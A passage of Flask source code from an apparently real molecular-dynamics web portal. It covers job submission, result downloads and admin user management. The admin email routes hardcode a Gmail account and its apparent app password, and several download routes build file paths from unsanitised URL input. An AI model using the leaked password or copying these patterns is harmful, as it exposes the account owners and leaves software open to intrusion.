#acessa o diretorio do log de execução
archive = open(Config.UPLOAD_FOLDER + current_user.username+ '/DirectoryLog', 'r')
directory = archive.readline()
archive.close()
#acessa o log de execução
archive = open(directory,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('livre.html', actlivre = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
archive.close()
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('livre.html', actlivre = 'active', steplist=steplist, name_dynamic=name_dynamic)
return render_template('livre.html', actlivre = 'active')
################
##### livre en #####
@app.route('/livre_en', methods=['GET', 'POST'], endpoint='livre_en')
@login_required
def livre_en():
if request.method == 'POST':
file = request.files.get('file')
CompleteFileName = generate(file.filename,
request.form.get('campoforca'),
request.form.get('modeloagua'),
request.form.get('tipocaixa'),
request.form.get('distanciacaixa'),
request.form.get('neutralize'),
request.form.get('double'),
request.form.get('ignore'),
current_user
)
if request.form.get('download') == 'Download':
return redirect(url_for('commandsdownload',
filename={"complete" : CompleteFileName,
"name": file.filename.split('.')[0]}))
if request.form.get('execute') == 'Executar':
if upload_file(file, current_user.username):
#checar se servidor esta em execução
executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
if not os.path.exists(executing):
f = open(executing,'w')
f.writelines('{}\n'.format(current_user.username))
f.close()
else:
flash('The same user is not allowed to perform two simultaneous dynamics.', 'danger')
return redirect(url_for('livre_en'))
executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
if not os.path.exists(executingLig):
f = open(executingLig, 'w')
f.close()
else:
flash('The same user is not allowed to perform two simultaneous dynamics.', 'danger')
return redirect(url_for('livre_en'))
#preparar para executar
MoleculeName = file.filename.split('.')[0]
filename = file.filename
AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
current_user.username, MoleculeName , 'run',
'logs/', filename)
exc = execute(AbsFileName, CompleteFileName, current_user.username, MoleculeName)
flash('There was an error in the command {} with status {}'.format(exc[1],exc[0]), 'danger')
else:
flash('File extension is incorrect', 'danger')
if CheckUserDynamics(current_user.username) == True:
flash('','steps')
steplist = CheckDynamicsSteps(current_user.username)
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executing', "r")
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em produçãomd
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução
archive = open(Config.UPLOAD_FOLDER + current_user.username+ '/DirectoryLog', 'r')
directory = archive.readline()
archive.close()
#acessa o log de execução
archive = open(directory,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('livre_en.html', actlivre = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
archive.close()
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('livre_en.html', actlivre = 'active', steplist=steplist, name_dynamic=name_dynamic)
return render_template('livre_en.html', actlivre = 'active')
#######################
##### ligante br #####
@app.route('/ligante', methods=['GET','POST'], endpoint='ligante')
@login_required
def ligante():
if request.method == 'POST':
file = request.files.get('file')
fileitp = request.files.get('fileitp')
filegro = request.files.get('filegro')
CompleteFileName = generateLig(file.filename,
fileitp.filename,
filegro.filename,
request.form.get('campoforca'),
request.form.get('modeloagua'),
request.form.get('tipocaixa'),
request.form.get('distanciacaixa'),
request.form.get('neutralize'),
request.form.get('double'),
request.form.get('ignore'),
current_user
)
if request.form.get('download') == 'Download':
name = file.filename.split('.')[0]+'_'+fileitp.filename.split('.')[0]
return redirect(url_for('commandsdownload',
filename={"complete" : CompleteFileName,
"name": name}))
if request.form.get('execute') == 'Executar':
if upload_file_ligante(file, fileitp, filegro, current_user.username): #dando upload no arquivo, salvando e checando
executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
if not os.path.exists(executingLig):
f = open(executingLig,'w')
f.writelines('{}\n'.format(current_user.username))
f.close()
else:
flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
return redirect(url_for('ligante'))
executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
if not os.path.exists(executing):
f = open(executing, 'w')
f.close()
else:
flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
return redirect(url_for('ligante'))
#preparar para executar
MoleculeName = file.filename.split('.')[0]
liganteitpName = fileitp.filename.split('.')[0]
ligantegroName = filegro.filename.split('.')[0]
moleculaLig = MoleculeName+'_'+liganteitpName
AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
current_user.username,moleculaLig, 'run',
'logs/', moleculaLig)
exc = executelig(AbsFileName, CompleteFileName, current_user.username, moleculaLig, fileitp.filename, filegro.filename, MoleculeName)
flash('Ocorreu um erro no comando {} com status {}'.format(exc[1],exc[0]), 'danger')
return redirect(url_for('ligante'))
else:
flash('A extensão dos arquivos está incorreta', 'danger')
if CheckUserDynamicsLig(current_user.username) == True:
flash('','steps')
steplist = CheckDynamicsStepsLig(current_user.username)
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executingLig','r')
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em produçãomd
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/DirectoryLog', 'r')
directory = archive.readline()
archive.close()
#acessa o log de execução
archive = open(directory,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('ligante.html', actlig = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('ligante.html', actlig = 'active', steplist=steplist, name_dynamic=name_dynamic)
return render_template('ligante.html', actlig = 'active')
###################
########## ligante en #############
@app.route('/ligante_en', methods=['GET','POST'], endpoint='ligante_en')
@login_required
def ligante_en():
if request.method == 'POST':
file = request.files.get('file')
fileitp = request.files.get('fileitp')
filegro = request.files.get('filegro')
CompleteFileName = generateLig(file.filename,
fileitp.filename,
filegro.filename,
request.form.get('campoforca'),
request.form.get('modeloagua'),
request.form.get('tipocaixa'),
request.form.get('distanciacaixa'),
request.form.get('neutralize'),
request.form.get('double'),
request.form.get('ignore'),
current_user
)
if request.form.get('download') == 'Download':
name = file.filename.split('.')[0]+'_'+fileitp.filename.split('.')[0]
return redirect(url_for('commandsdownload',
filename={"complete" : CompleteFileName,
"name": name}))
if request.form.get('execute') == 'Executar':
if upload_file_ligante(file, fileitp, filegro, current_user.username): #dando upload no arquivo, salvando e checando
executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
if not os.path.exists(executingLig):
f = open(executingLig,'w')
f.writelines('{}\n'.format(current_user.username))
f.close()
else:
flash('The same user is not allowed to perform two simultaneous dynamics.', 'danger')
return redirect(url_for('ligante_en'))
executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
if not os.path.exists(executing):
f = open(executing, 'w')
f.close()
else:
flash('The same user is not allowed to perform two simultaneous dynamics.', 'danger')
return redirect(url_for('ligante_en'))
#preparar para executar
MoleculeName = file.filename.split('.')[0]
liganteitpName = fileitp.filename.split('.')[0]
ligantegroName = filegro.filename.split('.')[0]
moleculaLig = MoleculeName+'_'+liganteitpName
AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
current_user.username,moleculaLig, 'run',
'logs/', moleculaLig)
exc = executelig(AbsFileName, CompleteFileName, current_user.username, moleculaLig, fileitp.filename, filegro.filename, MoleculeName)
flash('There was an error in the command {} with status {}'.format(exc[1],exc[0]), 'danger')
return redirect(url_for('ligante_en'))
else:
flash('The file extension is incorrect', 'danger')
if CheckUserDynamicsLig(current_user.username) == True:
flash('','steps')
steplist = CheckDynamicsStepsLig(current_user.username)
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executingLig','r')
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em produçãomd
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/DirectoryLog', 'r')
directory = archive.readline()
archive.close()
#acessa o log de execução
archive = open(directory,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('ligante_en.html', actlig = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('ligante_en.html', actlig = 'active', steplist=steplist, name_dynamic=name_dynamic)
return render_template('ligante_en.html', actlig = 'active')
#######################
###### ligante ACPYPE BR ######
##### ligante br #####
@app.route('/liganteACPYPE', methods=['GET','POST'], endpoint='liganteACPYPE')
@login_required
def liganteACPYPE():
if request.method == 'POST':
file = request.files.get('file')
fileitp = request.files.get('fileitp')
filegro = request.files.get('filegro')
CompleteFileName = generateLigACPYPE(file.filename,
fileitp.filename,
filegro.filename,
request.form.get('campoforca'),
request.form.get('modeloagua'),
request.form.get('tipocaixa'),
request.form.get('distanciacaixa'),
request.form.get('neutralize'),
request.form.get('double'),
request.form.get('ignore'),
current_user
)
if request.form.get('download') == 'Download':
name = file.filename.split('.')[0]+'_'+fileitp.filename.split('.')[0]
return redirect(url_for('commandsdownload',
filename={"complete" : CompleteFileName,
"name": name}))
if request.form.get('execute') == 'Executar':
if upload_file_ligante(file, fileitp, filegro, current_user.username): #dando upload no arquivo, salvando e checando
executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
if not os.path.exists(executingLig):
f = open(executingLig,'w')
f.writelines('{}\n'.format(current_user.username))
f.close()
else:
flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
return redirect(url_for('liganteACPYPE'))
executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
if not os.path.exists(executing):
f = open(executing, 'w')
f.close()
else:
flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
return redirect(url_for('liganteACPYPE'))
#preparar para executar
MoleculeName = file.filename.split('.')[0]
liganteitpName = fileitp.filename.split('.')[0]
ligantegroName = filegro.filename.split('.')[0]
moleculaLig = MoleculeName+'_'+liganteitpName
AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
current_user.username,moleculaLig, 'run',
'logs/', moleculaLig)
exc = executeLigACPYPE(AbsFileName, CompleteFileName, current_user.username, moleculaLig, fileitp.filename, ligantegroName, MoleculeName)
flash('Ocorreu um erro no comando {} com status {}'.format(exc[1],exc[0]), 'danger')
return redirect(url_for('liganteACPYPE'))
else:
flash('A extensão dos arquivos está incorreta', 'danger')
if CheckUserDynamicsLig(current_user.username) == True:
flash('','steps')
steplist = CheckDynamicsStepsLig(current_user.username)
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executingLig','r')
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em produçãomd
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/DirectoryLog', 'r')
directory = archive.readline()
archive.close()
#acessa o log de execução
archive = open(directory,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('liganteACPYPE.html', actligACPYPE = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('liganteACPYPE.html', actligACPYPE = 'active', steplist=steplist, name_dynamic=name_dynamic)
return render_template('liganteACPYPE.html', actligACPYPE = 'active')
###################
##### ligante ACPYPE en #####
@app.route('/liganteACPYPE_en', methods=['GET','POST'], endpoint='liganteACPYPE_en')
@login_required
def liganteACPYPE_en():
if request.method == 'POST':
file = request.files.get('file')
fileitp = request.files.get('fileitp')
filegro = request.files.get('filegro')
CompleteFileName = generateLigACPYPE(file.filename,
fileitp.filename,
filegro.filename,
request.form.get('campoforca'),
request.form.get('modeloagua'),
request.form.get('tipocaixa'),
request.form.get('distanciacaixa'),
request.form.get('neutralize'),
request.form.get('double'),
request.form.get('ignore'),
current_user
)
if request.form.get('download') == 'Download':
name = file.filename.split('.')[0]+'_'+fileitp.filename.split('.')[0]
return redirect(url_for('commandsdownload',
filename={"complete" : CompleteFileName,
"name": name}))
if request.form.get('execute') == 'Executar':
if upload_file_ligante(file, fileitp, filegro, current_user.username): #dando upload no arquivo, salvando e checando
executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
if not os.path.exists(executingLig):
f = open(executingLig,'w')
f.writelines('{}\n'.format(current_user.username))
f.close()
else:
flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
return redirect(url_for('liganteACPYPE_en'))
executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
if not os.path.exists(executing):
f = open(executing, 'w')
f.close()
else:
flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
return redirect(url_for('liganteACPYPE_en'))
#preparar para executar
MoleculeName = file.filename.split('.')[0]
liganteitpName = fileitp.filename.split('.')[0]
ligantegroName = filegro.filename.split('.')[0]
moleculaLig = MoleculeName+'_'+liganteitpName
AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
current_user.username,moleculaLig, 'run',
'logs/', moleculaLig)
exc = executeLigACPYPE(AbsFileName, CompleteFileName, current_user.username, moleculaLig, fileitp.filename, ligantegroName, MoleculeName)
flash('Ocorreu um erro no comando {} com status {}'.format(exc[1],exc[0]), 'danger')
return redirect(url_for('liganteACPYPE_en'))
else:
flash('A extensão dos arquivos está incorreta', 'danger')
if CheckUserDynamicsLig(current_user.username) == True:
flash('','steps')
steplist = CheckDynamicsStepsLig(current_user.username)
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executingLig','r')
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em produçãomd
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/DirectoryLog', 'r')
directory = archive.readline()
archive.close()
#acessa o log de execução
archive = open(directory,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('liganteACPYPE_en.html', actligACPYPE = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
return render_template('liganteACPYPE_en.html', actligACPYPE = 'active', steplist=steplist, name_dynamic=name_dynamic)
return render_template('liganteACPYPE_en.html', actligACPYPE = 'active')
###################
#############################
##### liganteATB br #####
@app.route('/liganteATB', methods=['GET','POST'], endpoint='liganteATB')
@login_required
def liganteATB():
flash('Esta funcionalidade está em desenvolvimento', 'danger')
return render_template('liganteATB.html', actligATB = 'active')
##################
###### liganteATB en ######
@app.route('/liganteATB_en', methods=['GET','POST'], endpoint='liganteATB_en')
@login_required
def liganteATB_en():
flash('This feature is in development', 'danger')
return render_template('liganteATB_en.html', actligATB = 'active')
##############
@app.route('/imgfiles/<filename>')
@login_required
def imgsdownload(filename):
filename = filename.split(' ')[1]
current_location = os.path.join(Config.UPLOAD_FOLDER, current_user.username, filename, 'graficos')
ziplocation = os.path.join(current_location, filename+'-graficos.zip')
zf = zipfile.ZipFile(ziplocation,'w')
#move os arquivos .xvg para a pasta graficos.
directory_xvg = os.path.join(Config.UPLOAD_FOLDER, current_user.username, filename,'run')
for folder, subfolders, files in os.walk(directory_xvg):
for file in files:
if file.endswith('.xvg'):
file = directory_xvg +'/'+file
shutil.move(file, current_location)
for folder, subfolders, files in os.walk(current_location):
for file in files:
if not file.endswith('.zip'):
zf.write(os.path.join(folder, file), file, compress_type = zipfile.ZIP_DEFLATED)
zf.close()
return (send_file(ziplocation, as_attachment=True))
@app.route('/downloadmdpfiles')
@login_required
def downloadmdpfiles():
ziplocation = os.path.join(Config.UPLOAD_FOLDER, current_user.username,'mdpfiles.zip')
mdplist = os.listdir(os.chdir(Config.MDP_LOCATION_FOLDER))
zf = zipfile.ZipFile(ziplocation,'w')
for file in mdplist:
if file.endswith('.mdp'):
zf.write(file, compress_type = zipfile.ZIP_DEFLATED)
zf.close()
return (send_file(ziplocation, as_attachment=True))
@app.route('/dynamiccomandsdownload/<filename>')
@login_required
def dynamiccomandsdownload(filename):
filename = filename.split(' ')[1]
os.chdir(Config.UPLOAD_FOLDER+'/'+current_user.username+'/'+filename)
files = glob.glob("*.txt")
files.sort(key=os.path.getmtime)
file_comands = files[len(files)-1]
directory = Config.UPLOAD_FOLDER+'/'+current_user.username+'/'+filename+'/'+file_comands
return (send_file(directory, as_attachment=True))
@app.route('/download/<filename>')
@login_required
def commandsdownload(filename):
filename = ast.literal_eval(filename)
return send_file('{}{}/{}/{}'.format(Config.UPLOAD_FOLDER,
current_user.username,filename["name"],filename["complete"]), as_attachment=True)
@app.route('/downloadlogs/<filename>')
@login_required
def downloalogs(filename):
filename = filename.split(' ')[1]
current_location = os.path.join(Config.UPLOAD_FOLDER, current_user.username, filename,'run','logs')
ziplocation = os.path.join(Config.UPLOAD_FOLDER, current_user.username, filename,'run','logs',filename+'-logs.zip')
zf = zipfile.ZipFile(ziplocation,'w')
for folder, subfolders, files in os.walk(current_location):
for file in files:
if not file.endswith('.zip'):
zf.write(os.path.join(folder, file), file, compress_type = zipfile.ZIP_DEFLATED)
zf.close()
return (send_file(ziplocation, as_attachment=True))
@login_manager.unauthorized_handler
def unauthorized_handler():
return redirect(url_for('logout'))
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('login'))
###### admin br ######
@app.route('/admin', methods=['GET', 'POST'], endpoint='admin')
@admin_required
def admin():
UserData = User.query.filter(User.register == 'True')
return render_template('admin.html', actadmin = 'active', UserData=UserData)
#####################
###### admin en #####
@app.route('/admin_en', methods=['GET', 'POST'], endpoint='admin_en')
@admin_required
def admin_en():
UserData = User.query.filter(User.register == 'True')
return render_template('admin_en.html', actadmin = 'active', UserData=UserData)
#####################
##### admin cadastro br #####
@app.route('/admin/cadastros', methods=['GET', 'POST'], endpoint='admin_cadastro')
@admin_required
def admin_cadastros():
NewUserData = User.query.filter(User.register == 'False')
return render_template('admin_cadastros.html', NewUserData=NewUserData)
#############################
###### admin cadastro en ######
@app.route('/admin/cadastros_en', methods=['GET', 'POST'], endpoint='admin_cadastro_en')
@admin_required
def admin_cadastros_en():
NewUserData = User.query.filter(User.register == 'False')
return render_template('admin_cadastros_en.html', NewUserData=NewUserData)
#############################
############# new user ################
@app.route('/admin/accept_newUser/<int:id>', methods=['GET', 'POST'])
@admin_required
def accept_newUser(id):
#ativa o cadastro do usuário.
UserData = User.query.get(int(id))
UserData.register = 'True'
name = UserData.name
email = UserData.email
db.session.add(UserData)
db.session.commit()
msg = MIMEText('<h3>Olá '+ name +', seu cadastro no Visual Dynamics foi aprovado.</h3>\
Acesse http://157.86.248.13:8080 para utilizar o sistema.\
<h5>E-mail gerado automáticamente, por favor não responder.</h5>','html', 'utf-8')
#Criar email da oficial para o sistema
msg['From'] = 'LABIOQUIM FIOCRUZ - RO'
msg['To'] = email
msg['Subject'] = 'Cadastro Visual Dynamics'
message = msg.as_string()
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login("labioquim.rondonia.fiocruz@gmail.com", "ietcbybgbiiyfrko")
server.sendmail("labioquim.rondonia.fiocruz@gmail.com", email, message)
server.quit()
flash('Solicitação de cadastro do(a) usuário(a) {} aceita com sucesso.'.format(UserData.username), 'primary')
return redirect(url_for('admin_cadastros'))
#####################################
############# new user en ###########
@app.route('/admin/accept_newUser_en/<int:id>', methods=['GET', 'POST'])
@admin_required
def accept_newUser_en(id):
#ativa o cadastro do usuário.
UserData = User.query.get(int(id))
UserData.register = 'True'
name = UserData.name
email = UserData.email
db.session.add(UserData)
db.session.commit()
msg = MIMEText('<h3>Hi '+ name +', your Visual Dynamics registration has been approved.</h3>\
Acess http://157.86.248.13:8080 to use the System.\
<h5>Automatically generated email, please dont answer.</h5>','html', 'utf-8')
#Criar email da oficial para o sistema
msg['From'] = 'LABIOQUIM FIOCRUZ - RO'
msg['To'] = email
msg['Subject'] = 'Visual Dynamics Register'
message = msg.as_string()
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login("labioquim.rondonia.fiocruz@gmail.com", "ietcbybgbiiyfrko")
server.sendmail("labioquim.rondonia.fiocruz@gmail.com", email, message)
server.quit()
flash('User registration request {} successfully accepted.'.format(UserData.username), 'primary')
return redirect(url_for('admin_cadastros_en'))
#####################################
####### admin_remove_br #########
@app.route('/admin/remove_newUser/<int:id>')
@admin_required
def remove_newUser(id):
UserData = User.query.get(int(id))
name = UserData.name
email = UserData.email
db.session.delete(UserData)
db.session.commit()
msg = MIMEText('<h3>Olá '+ name +', seu cadastro no Visual Dynamics não foi aprovado.</h3>\
Acesse http://157.86.248.13:8080 para tentar novamente.\
<h5>E-mail gerado automáticamente, por favor não responder.</h5>','html', 'utf-8')
#Criar email da oficial para o sistema
msg['From'] = 'labioquim.rondonia.fiocruz@gmail.com'
msg['To'] = email
msg['Subject'] = 'Cadastro Visual Dynamics'
message = msg.as_string()
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login("labioquim.rondonia.fiocruz@gmail.com", "ietcbybgbiiyfrko")
server.sendmail("labioquim.rondonia.fiocruz@gmail.com", email, message)
server.quit()
flash('Solicitação de cadastro do(a) usuário(a) {} removida com sucesso.'.format(UserData.username), 'primary')
return redirect(url_for('admin_cadastros'))
################################
##### admin remove en ########
@app.route('/admin/remove_newUser_en/<int:id>')
@admin_required
def remove_newUser_en(id):
UserData = User.query.get(int(id))
name = UserData.name
email = UserData.email
db.session.delete(UserData)
db.session.commit()
msg = MIMEText('<h3>Hi '+ name +', your Visual Dynamics registration has not been approved.</h3>\
Acess http://157.86.248.13:8080 to try again.\
<h5>Automatically generated email, please dont answer.</h5>','html', 'utf-8')
#Criar email da oficial para o sistema
msg['From'] = 'labioquim.rondonia.fiocruz@gmail.com'
msg['To'] = email
msg['Subject'] = 'Cadastro Visual Dynamics'
message = msg.as_string()
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login("labioquim.rondonia.fiocruz@gmail.com", "ietcbybgbiiyfrko")
server.sendmail("labioquim.rondonia.fiocruz@gmail.com", email, message)
server.quit()
flash('User registration request {} removed successfully. '.format(UserData.username), 'primary')
return redirect(url_for('admin_cadastros_en'))
############################
########## admin edit br ###########
@app.route('/admin/edit/<int:id>', methods=['GET', 'POST'])
@admin_required
def edit_user(id):
if request.method == 'POST':
name = request.form.get('name')
user = request.form.get('username')
email = request.form.get('email')
password = request.form.get('password')
passconfirm = request.form.get('passwordconfirm')
if password == '' and passconfirm == '':
UserData = User.query.get(int(id))
UserData.name = name
UserData.username = user
UserData.email = email
try:
db.session.add(UserData)
db.session.commit()
flash('Dados do(a) usuário(a) {} alterados com sucesso.'.format(user), 'primary')
return redirect(url_for('admin'))
except:
flash('Erro, email ou usuário já estão sendo utilizados.', 'danger')
return redirect(url_for('edit_user', id=id))
elif password == passconfirm:
UserData = User.query.get(int(id))
UserData.name = name
UserData.username = user
UserData.email = email
try:
UserData.set_password(password)
db.session.add(UserData)
db.session.commit()
flash('Dados do(a) usuário(a) {} alterados com sucesso.'.format(user), 'primary')
return redirect(url_for('admin'))
except:
flash('Erro, email ou usuário já estão sendo utilizados.', 'danger')
return redirect(url_for('edit_user', id=id))
flash('Erro ao editar usuário(a) {}.'.format(user), 'danger')
return redirect(url_for('admin'))
UserData = User.query.get(int(id))
return render_template('edit_user.html', UserData=UserData)
#########################
###### admin edit en #############
@app.route('/admin/edit_en/<int:id>', methods=['GET', 'POST'])
@admin_required
def edit_user_en(id):
if request.method == 'POST':
name = request.form.get('name')
user = request.form.get('username')
email = request.form.get('email')
password = request.form.get('password')
passconfirm = request.form.get('passwordconfirm')
if password == '' and passconfirm == '':
UserData = User.query.get(int(id))
UserData.name = name
UserData.username = user
UserData.email = email
try:
db.session.add(UserData)
db.session.commit()
flash('User data {} changed successfully. '.format(user), 'primary')
return redirect(url_for('admin_en'))
except:
flash('Error, email or user are already being used.', 'danger')
return redirect(url_for('edit_user_en', id=id))
elif password == passconfirm:
UserData = User.query.get(int(id))
UserData.name = name
UserData.username = user
UserData.email = email
try:
UserData.set_password(password)
db.session.add(UserData)
db.session.commit()
flash('User data {} changed successfully.'.format(user), 'primary')
return redirect(url_for('admin_en'))
except:
flash('Error, email or user are already being used.', 'danger')
return redirect(url_for('edit_user_en', id=id))
flash('Error editing user {}.'.format(user), 'danger')
return redirect(url_for('admin_en'))
UserData = User.query.get(int(id))
return render_template('edit_user_en.html', UserData=UserData)
############################
##### admin newUser br ########
@app.route('/admin/newUser', methods=['GET', 'POST'], endpoint='newUser')
@admin_required
def newuser():
if request.method == 'POST':
name = request.form.get('name')
user = request.form.get('username')
email = request.form.get('email')
password = request.form.get('password')
passconfirm = request.form.get('passwordconfirm')
#faz checagem para verificar se usuário ou senha já são utilizados
check_email = User.query.filter(User.email == email).first()
check_user = User.query.filter(User.username == user).first()
if check_email is None and check_user is None:
new = User(name=name,username=user,email=email,register='True')
new.set_password(password)
db.session.add(new)
db.session.commit()
flash('Cadastro do(a) Usuário(a) {} realizado com sucesso.'.format(user), 'primary')
return redirect(url_for('admin'))
else:
flash('Erro, email ou usuário já estão sendo utilizados.', 'danger')
return redirect(url_for('newuser'))
return render_template('new_user.html')
#################################
####### admin newUser en #######
@app.route('/admin/newUser_en', methods=['GET', 'POST'], endpoint='newUser_en')
@admin_required
def newuser_en():
if request.method == 'POST':
name = request.form.get('name')
user = request.form.get('username')
email = request.form.get('email')
password = request.form.get('password')
passconfirm = request.form.get('passwordconfirm')
#faz checagem para verificar se usuário ou senha já são utilizados
check_email = User.query.filter(User.email == email).first()
check_user = User.query.filter(User.username == user).first()
if check_email is None and check_user is None:
new = User(name=name,username=user,email=email,register='True')
new.set_password(password)
db.session.add(new)
db.session.commit()
flash('User registration {} carried out successfully.'.format(user), 'primary')
return redirect(url_for('admin_en'))
else:
flash('Error, email or user are already being used.', 'danger')
return redirect(url_for('newuser_en'))
return render_template('new_user_en.html')
################################
##############admin limpar pasta##########
@app.route('/admin/limpar/<int:id>')
@admin_required
def cleanfolder(id):
UserData = User.query.get(int(id))
user = UserData.username
path = Config.UPLOAD_FOLDER + user
if os.path.exists(path):
try:
shutil.rmtree(path)
except OSError as e:
flash("Error: %s - %s " % (e.filename, e.strerror))
try:
os.mkdir(path)
except FileExistsError as e:
flash('Pasta {path} já existe.')
flash('Os Arquivos na pasta {} foram apagados com sucesso.'.format(user), 'primary')
return redirect(url_for('admin'))
##############################################
##### admin remove br ######
@app.route('/admin/remove/<int:id>')
@admin_required
def removeuser(id):
UserData = User.query.get(int(id))
if UserData.username != 'admin':
db.session.delete(UserData)
db.session.commit()
flash('Usuário(a) {} removido(a) com sucesso.'.format(UserData.username), 'primary')
return redirect(url_for('admin'))
flash('Não é possível remover o admin', 'danger')
return redirect(url_for('admin'))
############################
#### admin edit-md br ####
@app.route('/admin/edit-md', methods = ['GET', 'POST'])
@admin_required
def edit_md():
os.chdir(Config.MDP_LOCATION_FOLDER)
#modifica o valor do nsteps no arquivo ions.mdp
if request.method == 'POST':
new_nsteps = request.form.get('editnstep')
new_dt = request.form.get('editDt')
archive = open("md_pr.mdp","r")
file = archive.readlines()
#altera o valor do nsteps
for i, text in enumerate(file):
if text.find('nsteps') > -1:
archive = open("md_pr.mdp","w")
# altera a linha inteira do nsteps
file[i] = "nsteps = "+ new_nsteps +" ; 2 * 50000 = 1000 ps (1 ns) \n"
archive.writelines(file)
#altera o valor do emstep
for i, text in enumerate(file):
if text.find('dt') > -1:
archive = open("md_pr.mdp","w")
# altera a linha inteira do nsteps
file[i] = "dt = "+ new_dt +" ; 2 fs \n"
archive.writelines(file)
flash('atualização realizada com sucesso.', 'primary')
return redirect(url_for('admin'))
#busca o valor do nsteps no arquivo ions.mdp para exibir para o usuario
# i é o indice (posição)
try:
archive = open("md_pr.mdp","r")
except:
flash('Ocorreu um erro ao localizar arquivo, tente novamente mais tarde.', 'danger')
